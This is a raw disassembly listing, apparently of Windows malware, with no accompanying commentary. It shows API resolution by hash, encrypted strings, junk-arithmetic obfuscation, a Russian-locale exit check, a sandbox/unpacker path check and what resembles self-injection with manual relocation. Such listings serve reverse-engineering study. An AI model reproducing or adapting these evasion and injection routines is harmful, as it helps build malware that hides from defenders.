push 4
pop edi
jmp short loc_401C5C
; ---------------------------------------------------------------------------
loc_401C49: ; CODE XREF: sub_401879+249�j
add eax, 0FFFFFFFEh
cmp eax, 3FEh
ja short loc_401C5C
mov [ebp+arg_8], bl
jmp short loc_401C5C
; ---------------------------------------------------------------------------
loc_401C58: ; CODE XREF: sub_401879+409�j
cmp al, bl
jz short loc_401C84
loc_401C5C: ; CODE XREF: sub_401879+3CE�j
; sub_401879+3D8�j ...
push 1A212962h
push edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_478]
push ecx
push [ebp+var_C]
call eax
test eax, eax
setnz al
cmp [ebp+var_4], ebx
ja short loc_401C58
loc_401C84: ; CODE XREF: sub_401879+3E1�j
cmp dword_405104, 8
jl short loc_401C93
inc dword_405104
loc_401C93: ; CODE XREF: sub_401879+412�j
cmp dword_405104, 0AEh
jle short loc_401CA9
mov dword_405104, 14h
loc_401CA9: ; CODE XREF: sub_401879+424�j
push 7314FB0Ch
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+var_C]
call eax
push 7314FB0Ch
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+var_10]
call eax
push 35h
pop eax
push 0FFFFFFE3h
pop ecx
loc_401CD3: ; CODE XREF: sub_401879+46F�j
cmp ecx, 80h
ja short loc_401CDD
inc eax
inc ecx
loc_401CDD: ; CODE XREF: sub_401879+460�j
add eax, 1Ch
add ecx, 1Ch
cmp eax, 8Bh
jl short loc_401CD3
push 8F8F114h
push 1
mov dword_405104, eax
call sub_401117
pop ecx
pop ecx
push ebx
push 80h
push 3
push ebx
push 1
push 80000000h
push [ebp+arg_4]
call eax
push 0AEF7CBF1h
push 1
mov edi, eax
call sub_401117
pop ecx
pop ecx
push ebx
push edi
call eax
mov [ebp+var_1C], eax
mov eax, dword_405104
add eax, 0FFFFFFFCh
cmp eax, 0F0h
ja short loc_401D3E
inc dword_405104
loc_401D3E: ; CODE XREF: sub_401879+4BD�j
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push edi
call eax
mov eax, dword_405104
inc [ebp+var_8]
lea ecx, [eax-0Ah]
cmp ecx, 0EBh
ja short loc_401D68
inc eax
mov dword_405104, eax
loc_401D68: ; CODE XREF: sub_401879+4E7�j
mov ecx, [ebp+var_14]
cmp ecx, [ebp+var_1C]
jz short loc_401D7F
cmp [ebp+var_8], 2
jge short loc_401D7F
cmp [ebp+arg_8], bl
jnz loc_401915
loc_401D7F: ; CODE XREF: sub_401879+4F5�j
; sub_401879+4FB�j
cmp eax, 11h
pop edi
pop esi
jl short loc_401D8C
inc eax
mov dword_405104, eax
loc_401D8C: ; CODE XREF: sub_401879+50B�j
cmp eax, 0B1h
jle short loc_401D9D
mov dword_405104, 21h
loc_401D9D: ; CODE XREF: sub_401879+518�j
lea eax, [ecx-2]
cmp eax, 3FEh
ja short loc_401DAE
xor eax, eax
jmp loc_401E45
; ---------------------------------------------------------------------------
loc_401DAE: ; CODE XREF: sub_401879+52C�j
cmp [ebp+arg_8], bl
jz loc_401E42
add ecx, 0FFFFFBFFh
cmp ecx, 48FDEh
ja short loc_401E42
push 32h
pop eax
push 8
pop ecx
loc_401DCB: ; CODE XREF: sub_401879+567�j
cmp ecx, 0CDh
ja short loc_401DD5
inc eax
inc ecx
loc_401DD5: ; CODE XREF: sub_401879+558�j
add eax, 13h
add ecx, 13h
cmp eax, 8Bh
jl short loc_401DCB
push 40h
mov dword_405104, eax
lea eax, [ebp+var_74]
push ebx
push eax
mov [ebp+var_78], 44h
call sub_4010BB
push 46318AC7h
push 1
call sub_401117
add esp, 14h
lea ecx, [ebp+var_34]
push ecx
lea ecx, [ebp+var_78]
push ecx
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_4]
push ebx
call eax
mov eax, dword_405104
add eax, 0FFFFFFDDh
cmp eax, 0D3h
ja short loc_401E32
inc dword_405104
loc_401E32: ; CODE XREF: sub_401879+5B1�j
cmp [ebp+var_8], 1
jnz short loc_401E3D
xor eax, eax
inc eax
jmp short loc_401E45
; ---------------------------------------------------------------------------
loc_401E3D: ; CODE XREF: sub_401879+5BD�j
push 2
pop eax
jmp short loc_401E45
; ---------------------------------------------------------------------------
loc_401E42: ; CODE XREF: sub_401879+538�j
; sub_401879+54A�j
or eax, 0FFFFFFFFh
loc_401E45: ; CODE XREF: sub_401879+530�j
; sub_401879+5C2�j ...
pop ebx
leave
retn
sub_401879 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_401E48 proc near ; CODE XREF: sub_402CF4:loc_40301D�p
; DATA XREF: sub_402B66+12C�o
var_2B4 = byte ptr -2B4h
var_1B4 = byte ptr -1B4h
var_B4 = byte ptr -0B4h
var_A4 = byte ptr -0A4h
var_94 = byte ptr -94h
var_84 = byte ptr -84h
var_74 = byte ptr -74h
var_64 = byte ptr -64h
var_54 = byte ptr -54h
var_44 = byte ptr -44h
var_34 = byte ptr -34h
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = byte ptr -1Eh
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_10 = word ptr -10h
var_C = word ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 2B4h
push ebx
push esi
push edi
push 0Bh
mov esi, offset dword_405208
push esi
push offset dword_404034
call sub_40102E
mov edi, 0C8AC8026h
xor ebx, ebx
push edi
inc ebx
push ebx
call sub_401117
add esp, 14h
push esi
call eax
push 0Ah
push esi
push offset dword_4041E8
call sub_40102E
push edi
push ebx
call sub_401117
add esp, 14h
push esi
call eax
push 0Ch
push esi
push offset dword_4041D8
call sub_40102E
push edi
push ebx
call sub_401117
add esp, 14h
push esi
call eax
mov eax, dword_405104
lea ecx, [eax-14h]
cmp ecx, 0E2h
mov byte ptr [ebp+78h+var_8], bl
ja short loc_401ECA
inc eax
mov dword_405104, eax
loc_401ECA: ; CODE XREF: sub_401E48+7A�j
xor edi, edi
lea ecx, [eax-9]
cmp ecx, 0E9h
mov [ebp+78h+var_24], edi
ja short loc_401EE0
inc eax
mov dword_405104, eax
loc_401EE0: ; CODE XREF: sub_401E48+90�j
push 7A813811h
push ebx
call sub_401117
pop ecx
pop ecx
call eax
cmp dword_405104, 0Ah
movzx eax, ax
mov [ebp+78h+var_4], eax
jl short loc_401F04
inc dword_405104
loc_401F04: ; CODE XREF: sub_401E48+B4�j
cmp dword_405104, 0E5h
jle short loc_401F1A
mov dword_405104, 19h
loc_401F1A: ; CODE XREF: sub_401E48+C6�j
push 3
push esi
push offset dword_4041D4
call sub_40102E
push 67ECDE97h
push ebx
call sub_401117
add esp, 14h
push edi
push edi
push edi
push edi
lea ecx, [ebp+78h+var_24]
push ecx
push edi
push edi
push esi
call eax
push 2
push esi
push offset dword_4041D0
call sub_40102E
push [ebp+78h+var_24]
lea eax, [ebp+78h+var_44]
push esi
push eax
call dword_404014 ; wsprintfA
mov eax, dword_405104
add eax, 0FFFFFFF4h
add esp, 18h
cmp eax, 0E3h
ja short loc_401F75
inc dword_405104
loc_401F75: ; CODE XREF: sub_401E48+125�j
push 0Bh
push esi
push offset dword_4041C4
call sub_40102E
mov edi, dword_404000
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_B4]
push eax
call edi ; lstrcpy
push 9
push esi
push offset dword_4041B8
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_A4]
push eax
call edi ; lstrcpy
push 0Ah
push esi
push offset dword_4041AC
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_94]
push eax
call edi ; lstrcpy
push 0Bh
push esi
push offset dword_4041A0
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_84]
push eax
call edi ; lstrcpy
push 0Dh
push esi
push offset dword_404190
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_74]
push eax
call edi ; lstrcpy
push 0Bh
push esi
push offset dword_404184
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_64]
push eax
call edi ; lstrcpy
push 9
push esi
push offset dword_404178
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_54]
push eax
call edi ; lstrcpy
mov eax, dword_405104
add eax, 0FFFFFFFBh
cmp eax, 0E6h
ja short loc_402031
inc dword_405104
loc_402031: ; CODE XREF: sub_401E48+1E1�j
push 26h
push esi
push offset dword_404150
call sub_40102E
add esp, 0Ch
push esi
push offset dword_405108
call edi ; lstrcpy
push 27h
push esi
push offset dword_404128
call sub_40102E
add esp, 0Ch
push esi
push offset dword_405308
call edi ; lstrcpy
cmp dword_405104, 13h
jl short loc_402070
inc dword_405104
loc_402070: ; CODE XREF: sub_401E48+220�j
cmp dword_405104, 0A7h
jle short loc_402086
mov dword_405104, 15h
loc_402086: ; CODE XREF: sub_401E48+232�j
cmp word ptr [ebp+78h+var_4], 419h
jz loc_402757
call sub_401094
test eax, eax
jnz loc_402757
call sub_401330
test al, al
jz short loc_4020B0
push 0
call sub_4014C4
pop ecx
loc_4020B0: ; CODE XREF: sub_401E48+25E�j
mov eax, dword_405104
add eax, 0FFFFFFD7h
cmp eax, 0A2h
ja short loc_4020C5
inc dword_405104
loc_4020C5: ; CODE XREF: sub_401E48+275�j
push 3
push esi
push offset dword_404124
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
mov ebx, dword_40400C
lea eax, [ebp+78h+var_44]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 19h
push esi
push offset dword_404108
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push 1
push 0
lea eax, [ebp+78h+var_1B4]
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_401879
add esp, 10h
cmp dword_405104, 7
jl short loc_402135
inc dword_405104
loc_402135: ; CODE XREF: sub_401E48+2E5�j
cmp dword_405104, 0B3h
jle short loc_40214B
mov dword_405104, 23h
loc_40214B: ; CODE XREF: sub_401E48+2F7�j
push 2
push esi
push offset dword_404104
call sub_40102E
add esp, 0Ch
lea eax, [ebp+78h+var_1B4]
push esi
push eax
call edi ; lstrcpy
cmp word ptr [ebp+78h+var_4], 410h
jnz short loc_4021E8
lea eax, [ebp+78h+var_A4]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 7
push esi
push offset dword_4040FC
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push 1
push 1
lea eax, [ebp+78h+var_1B4]
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_401879
add [ebp+78h+var_4], eax
add esp, 10h
cmp eax, 2
jnz short loc_4021BA
mov byte ptr [ebp+78h+var_8], 0
loc_4021BA: ; CODE XREF: sub_401E48+36C�j
cmp dword_405104, 6
jl short loc_4021C9
inc dword_405104
loc_4021C9: ; CODE XREF: sub_401E48+379�j
cmp dword_405104, 0B0h
jle loc_402447
mov dword_405104, 1Bh
jmp loc_402447
; ---------------------------------------------------------------------------
loc_4021E8: ; CODE XREF: sub_401E48+323�j
lea eax, [ebp+78h+var_B4]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 0Bh
push esi
push offset dword_4040F0
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push 1
push 1
lea eax, [ebp+78h+var_1B4]
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_401879
add [ebp+78h+var_4], eax
add esp, 10h
cmp eax, 2
jnz short loc_402235
mov byte ptr [ebp+78h+var_8], 0
loc_402235: ; CODE XREF: sub_401E48+3E7�j
mov eax, dword_405104
add eax, 0FFFFFF9Ch
cmp eax, 6Bh
ja short loc_402248
inc dword_405104
loc_402248: ; CODE XREF: sub_401E48+3F8�j
push 2
push esi
push offset dword_404104
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
lea eax, [ebp+78h+var_74]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 9
push esi
push offset dword_4040E4
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push [ebp+78h+var_8]
lea eax, [ebp+78h+var_1B4]
push 1
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_401879
add [ebp+78h+var_4], eax
add esp, 10h
cmp eax, 2
jnz short loc_4022B0
mov byte ptr [ebp+78h+var_8], 0
loc_4022B0: ; CODE XREF: sub_401E48+462�j
mov eax, dword_405104
add eax, 0FFFFFFD8h
cmp eax, 0CFh
ja short loc_4022C5
inc dword_405104
loc_4022C5: ; CODE XREF: sub_401E48+475�j
push 2
push esi
push offset dword_404104
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
lea eax, [ebp+78h+var_64]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 0Ah
push esi
push offset dword_4040D8
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push [ebp+78h+var_8]
lea eax, [ebp+78h+var_1B4]
push 1
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_401879
add [ebp+78h+var_4], eax
add esp, 10h
cmp eax, 2
jnz short loc_40232D
mov byte ptr [ebp+78h+var_8], 0
loc_40232D: ; CODE XREF: sub_401E48+4DF�j
push 2
push esi
push offset dword_404104
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
lea eax, [ebp+78h+var_94]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 0Dh
push esi
push offset dword_4040C8
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push [ebp+78h+var_8]
lea eax, [ebp+78h+var_1B4]
push 1
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_401879
add [ebp+78h+var_4], eax
add esp, 10h
cmp eax, 2
jnz short loc_402395
mov byte ptr [ebp+78h+var_8], 0
loc_402395: ; CODE XREF: sub_401E48+547�j
cmp dword_405104, 0Ch
jl short loc_4023A4
inc dword_405104
loc_4023A4: ; CODE XREF: sub_401E48+554�j
cmp dword_405104, 97h
jle short loc_4023BA
mov dword_405104, 24h
loc_4023BA: ; CODE XREF: sub_401E48+566�j
push 2
push esi
push offset dword_404104
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
lea eax, [ebp+78h+var_84]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 9
push esi
push offset dword_4040BC
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push [ebp+78h+var_8]
lea eax, [ebp+78h+var_1B4]
push 1
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_401879
add [ebp+78h+var_4], eax
add esp, 10h
cmp eax, 2
jnz short loc_402422
mov byte ptr [ebp+78h+var_8], 0
loc_402422: ; CODE XREF: sub_401E48+5D4�j
cmp dword_405104, 2
jl short loc_402431
inc dword_405104
loc_402431: ; CODE XREF: sub_401E48+5E1�j
cmp dword_405104, 0E8h
jle short loc_402447
mov dword_405104, 22h
loc_402447: ; CODE XREF: sub_401E48+38B�j
; sub_401E48+39B�j ...
push 2
push esi
push offset dword_404104
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
lea eax, [ebp+78h+var_54]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 9
push esi
push offset dword_4040B0
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push [ebp+78h+var_8]
lea eax, [ebp+78h+var_1B4]
push 1
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_401879
add [ebp+78h+var_4], eax
add esp, 10h
cmp eax, 2
jnz short loc_4024AF
mov byte ptr [ebp+78h+var_8], 0
loc_4024AF: ; CODE XREF: sub_401E48+661�j
cmp [ebp+78h+var_4], 0
jle loc_402757
push 3
push esi
push offset dword_404124
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
lea eax, [ebp+78h+var_44]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
mov eax, dword_405104
add eax, 0FFFFFFD1h
cmp eax, 0C1h
ja short loc_4024F5
inc dword_405104
loc_4024F5: ; CODE XREF: sub_401E48+6A5�j
push 1Bh
push esi
push offset dword_404094
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push 270118E2h
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+78h+var_34]
push ecx
call eax
push 2
push esi
mov edi, offset dword_404090
push edi
call sub_40102E
movzx eax, [ebp+78h+var_2C]
push eax
lea eax, [ebp+78h+var_10]
push esi
push eax
call dword_404014 ; wsprintfA
mov al, byte ptr [ebp+78h+var_10]
add al, 1Dh
add esp, 18h
cmp byte ptr [ebp+78h+var_10+1], 0
mov [ebp+78h+var_17], al
jnz short loc_402558
mov [ebp+78h+var_15], 30h
jmp short loc_402560
; ---------------------------------------------------------------------------
loc_402558: ; CODE XREF: sub_401E48+708�j
mov al, byte ptr [ebp+78h+var_10+1]
add al, 13h
mov [ebp+78h+var_15], al
loc_402560: ; CODE XREF: sub_401E48+70E�j
cmp dword_405104, 6Bh
jge short loc_40256F
inc dword_405104
loc_40256F: ; CODE XREF: sub_401E48+71F�j
push 2
push esi
push edi
call sub_40102E
movzx eax, [ebp+78h+var_2A]
push eax
lea eax, [ebp+78h+var_C]
push esi
push eax
call dword_404014 ; wsprintfA
mov al, byte ptr [ebp+78h+var_C]
add al, 17h
add esp, 18h
cmp dword_405104, 0Ah
mov [ebp+78h+var_18], al
jl short loc_4025A2
inc dword_405104
loc_4025A2: ; CODE XREF: sub_401E48+752�j
cmp dword_405104, 0F1h
jle short loc_4025B8
mov dword_405104, 1Dh
loc_4025B8: ; CODE XREF: sub_401E48+764�j
cmp byte ptr [ebp+78h+var_C+1], 0
jnz short loc_4025C4
mov [ebp+78h+var_16], 30h
jmp short loc_4025CC
; ---------------------------------------------------------------------------
loc_4025C4: ; CODE XREF: sub_401E48+774�j
mov al, byte ptr [ebp+78h+var_C+1]
add al, 19h
mov [ebp+78h+var_16], al
loc_4025CC: ; CODE XREF: sub_401E48+77A�j
lea eax, [ebp+78h+var_18]
push eax
lea eax, [ebp+78h+var_2B4]
push eax
mov [ebp+78h+var_14], 0
call ebx ; lstrcat
push 7
push esi
push offset dword_404088
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call ebx ; lstrcat
push 270118E2h
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+78h+var_34]
push ecx
call eax
cmp dword_405104, 0Fh
jl short loc_40261A
inc dword_405104
loc_40261A: ; CODE XREF: sub_401E48+7CA�j
cmp dword_405104, 9Bh
jle short loc_402630
mov dword_405104, 18h
loc_402630: ; CODE XREF: sub_401E48+7DC�j
push 2
push esi
push edi
call sub_40102E
movzx eax, [ebp+78h+var_2C]
push eax
lea eax, [ebp+78h+var_10]
push esi
push eax
call dword_404014 ; wsprintfA
mov ax, [ebp+78h+var_10]
add esp, 18h
cmp dword_405104, 7Eh
mov [ebp+78h+var_1F], al
jge short loc_402662
inc dword_405104
loc_402662: ; CODE XREF: sub_401E48+812�j
test ah, ah
mov [ebp+78h+var_1E], 30h
jz short loc_40266D
mov [ebp+78h+var_1E], ah
loc_40266D: ; CODE XREF: sub_401E48+820�j
mov eax, dword_405104
add eax, 0FFFFFFF2h
cmp eax, 0E4h
ja short loc_402682
inc dword_405104
loc_402682: ; CODE XREF: sub_401E48+832�j
push 2
push esi
push edi
call sub_40102E
movzx eax, [ebp+78h+var_2A]
push eax
lea eax, [ebp+78h+var_C]
push esi
push eax
call dword_404014 ; wsprintfA
mov ax, [ebp+78h+var_C]
add esp, 18h
test ah, ah
mov [ebp+78h+var_1D], al
mov [ebp+78h+var_20], 30h
jz short loc_4026B0
mov [ebp+78h+var_20], ah
loc_4026B0: ; CODE XREF: sub_401E48+863�j
push 29h
pop eax
push 17h
pop ecx
loc_4026B6: ; CODE XREF: sub_401E48+883�j
cmp ecx, 0BAh
ja short loc_4026C0
inc eax
inc ecx
loc_4026C0: ; CODE XREF: sub_401E48+874�j
add eax, 1Bh
add ecx, 1Bh
cmp eax, 97h
jl short loc_4026B6
mov dword_405104, eax
lea eax, [ebp+78h+var_20]
push eax
lea eax, [ebp+78h+var_2B4]
push eax
mov [ebp+78h+var_1C], 0
call ebx ; lstrcat
push 4
push esi
push offset dword_404080
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call ebx ; lstrcat
lea eax, [ebp+78h+var_44]
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call ebx ; lstrcat
cmp dword_405104, 0AFh
jge short loc_40271C
inc dword_405104
loc_40271C: ; CODE XREF: sub_401E48+8CC�j
push [ebp+78h+var_8]
lea eax, [ebp+78h+var_1B4]
push 0
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_401879
add esp, 10h
push 55h
pop eax
push 37h
pop ecx
loc_40273D: ; CODE XREF: sub_401E48+908�j
cmp ecx, 0D0h
ja short loc_402747
inc eax
inc ecx
loc_402747: ; CODE XREF: sub_401E48+8FB�j
add eax, 21h
add ecx, 21h
cmp eax, 7Fh
jl short loc_40273D
mov dword_405104, eax
loc_402757: ; CODE XREF: sub_401E48+244�j
; sub_401E48+251�j ...
push 95902B19h
push 1
call sub_401117
pop ecx
pop ecx
push 0
call eax
pop edi
pop esi
pop ebx
add ebp, 78h
leave
retn
sub_401E48 endp
; =============== S U B R O U T I N E =======================================
sub_402771 proc near ; DATA XREF: sub_402B66+4A�o
cmp dword_405104, 9
jl short loc_402780
inc dword_405104
loc_402780: ; CODE XREF: sub_402771+7�j
cmp dword_405104, 99h
jle short loc_402796
mov dword_405104, 1Fh
loc_402796: ; CODE XREF: sub_402771+19�j
push esi
push edi
mov edi, 81F0F0DFh
push edi
push 1
call sub_401117
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
jmp short loc_4027DE
; ---------------------------------------------------------------------------
loc_4027AC: ; CODE XREF: sub_402771+74�j
push 1297812Ch
push 1
call sub_401117
pop ecx
pop ecx
call eax
cmp eax, 2
jz short loc_4027E7
push 3D9972F5h
push 1
call sub_401117
pop ecx
pop ecx
push 3E8h
call eax
push edi
push 1
call sub_401117
loc_4027DE: ; CODE XREF: sub_402771+39�j
pop ecx
pop ecx
push esi
call eax
test eax, eax
jz short loc_4027AC
loc_4027E7: ; CODE XREF: sub_402771+4E�j
pop edi
xor eax, eax
pop esi
retn 4
sub_402771 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4027EE proc near ; CODE XREF: sub_402B66+131�p
; sub_402CF4+13D�p ...
var_30C = dword ptr -30Ch
var_25C = dword ptr -25Ch
var_40 = byte ptr -40h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 30Ch
call sub_401113
and eax, 0FFFF0000h
mov ecx, [eax+3Ch]
add ecx, eax
cmp dword_405104, 13h
mov [ebp+var_10], eax
lea eax, [ecx+18h]
mov [ebp+var_8], eax
mov eax, [eax+38h]
mov [ebp+var_1C], ecx
mov [ebp+var_18], eax
jl short loc_402827
inc dword_405104
loc_402827: ; CODE XREF: sub_4027EE+31�j
push ebx
push esi
push edi
mov edi, 0A8h
cmp dword_405104, edi
jle short loc_402841
mov dword_405104, 1Dh
loc_402841: ; CODE XREF: sub_4027EE+47�j
push 0A08B638Ch
push 1
xor ebx, ebx
call sub_401117
pop ecx
pop ecx
push 9
call eax
mov esi, eax
neg esi
sbb esi, esi
and esi, 3Ch
add esi, 4
cmp dword_405104, 2
jl short loc_402870
inc dword_405104
loc_402870: ; CODE XREF: sub_4027EE+7A�j
cmp dword_405104, edi
jle short loc_402882
mov dword_405104, 22h
loc_402882: ; CODE XREF: sub_4027EE+88�j
push 0EF0A25B7h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push [ebp+var_18]
push ebx
push esi
push ebx
push 0FFFFFFFFh
call eax
cmp eax, ebx
mov [ebp+var_4], eax
jnz short loc_4028A9
xor al, al
jmp loc_402B61
; ---------------------------------------------------------------------------
loc_4028A9: ; CODE XREF: sub_4027EE+B2�j
push 5CD9430h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push 2
push [ebp+var_4]
call eax
cmp eax, ebx
mov [ebp+var_14], eax
jz loc_402B3D
push 12h
mov edi, offset dword_405208
push edi
push offset dword_404214
call sub_40102E
add esp, 0Ch
push edi
lea eax, [ebp+var_40]
push eax
call dword_404000 ; lstrcpy
cmp dword_405104, 8
jl short loc_4028FB
inc dword_405104
loc_4028FB: ; CODE XREF: sub_4027EE+105�j
cmp dword_405104, 0EAh
jle short loc_402911
mov dword_405104, 14h
loc_402911: ; CODE XREF: sub_4027EE+117�j
push 9
push edi
push offset dword_404208
call sub_40102E
push 0C8AC8026h
push 1
call sub_401117
add esp, 14h
push edi
call eax
push 1FC0EAEEh
push 1
mov edi, eax
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_40]
push ecx
push edi
call eax
cmp dword_405104, 0Bh
mov [ebp+var_C], ebx
jl short loc_402959
inc dword_405104
loc_402959: ; CODE XREF: sub_4027EE+163�j
cmp dword_405104, 0DFh
jle short loc_40296F
mov dword_405104, 26h
loc_40296F: ; CODE XREF: sub_4027EE+175�j
mov edi, [ebp+var_18]
push esi
push ebx
push 1
lea ecx, [ebp+var_20]
push ecx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_C]
push ecx
push [ebp+arg_4]
mov [ebp+var_20], edi
push [ebp+var_4]
call eax
mov esi, [ebp+var_10]
push edi
push esi
push [ebp+var_14]
call sub_4010EE
mov eax, [ebp+var_1C]
movzx ecx, word ptr [eax+14h]
mov edx, dword_405104
add ecx, [ebp+var_8]
add esp, 0Ch
cmp edx, 11h
jge short loc_4029B8
inc edx
mov dword_405104, edx
loc_4029B8: ; CODE XREF: sub_4027EE+1C1�j
mov edi, [ebp+var_C]
mov eax, edi
sub eax, esi
cmp edx, 0BCh
mov [ebp+var_8], eax
jge short loc_4029D1
inc edx
mov dword_405104, edx
loc_4029D1: ; CODE XREF: sub_4027EE+1DA�j
mov eax, [ecx+34h]
add eax, esi
loc_4029D6: ; CODE XREF: sub_4027EE+1F9�j
cmp word ptr [eax], 0BE8Dh
jnz short loc_4029E6
cmp dword ptr [eax+6], 0C009078Bh
jz short loc_4029E9
loc_4029E6: ; CODE XREF: sub_4027EE+1ED�j
inc eax
jmp short loc_4029D6
; ---------------------------------------------------------------------------
loc_4029E9: ; CODE XREF: sub_4027EE+1F6�j
mov eax, [eax+2]
add eax, [ecx+0Ch]
add eax, esi
lea esi, [edx-3Ch]
cmp esi, 0A3h
ja short loc_402A12
inc edx
mov dword_405104, edx
jmp short loc_402A12
; ---------------------------------------------------------------------------
loc_402A05: ; CODE XREF: sub_4027EE+226�j
add eax, 8
jmp short loc_402A0B
; ---------------------------------------------------------------------------
loc_402A0A: ; CODE XREF: sub_4027EE+220�j
inc eax
loc_402A0B: ; CODE XREF: sub_4027EE+21A�j
cmp [eax], bx
jnz short loc_402A0A
inc eax
inc eax
loc_402A12: ; CODE XREF: sub_4027EE+20C�j
; sub_4027EE+215�j
cmp [eax], ebx
jnz short loc_402A05
lea esi, [edx-10h]
cmp esi, 0C3h
ja short loc_402A28
inc edx
mov dword_405104, edx
loc_402A28: ; CODE XREF: sub_4027EE+231�j
mov ecx, [ecx+0Ch]
mov esi, [ebp+var_14]
add eax, 4
lea edx, [ecx+esi-4]
mov cl, [eax]
inc eax
cmp cl, bl
jz short loc_402A66
loc_402A3C: ; CODE XREF: sub_4027EE+273�j
cmp cl, 0F0h
jnb short loc_402A48
movzx ecx, cl
add edx, ecx
jmp short loc_402A57
; ---------------------------------------------------------------------------
loc_402A48: ; CODE XREF: sub_4027EE+251�j
movzx edi, word ptr [eax]
and ecx, 0Fh
shl ecx, 10h
or ecx, edi
add edx, ecx
inc eax
inc eax
loc_402A57: ; CODE XREF: sub_4027EE+258�j
mov ecx, [ebp+var_8]
add [edx], ecx
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_402A3C
mov edi, [ebp+var_C]
loc_402A66: ; CODE XREF: sub_4027EE+24C�j
push 31h
pop eax
push 2Bh
pop ecx
loc_402A6C: ; CODE XREF: sub_4027EE+291�j
cmp ecx, 0C3h
ja short loc_402A76
inc eax
inc ecx
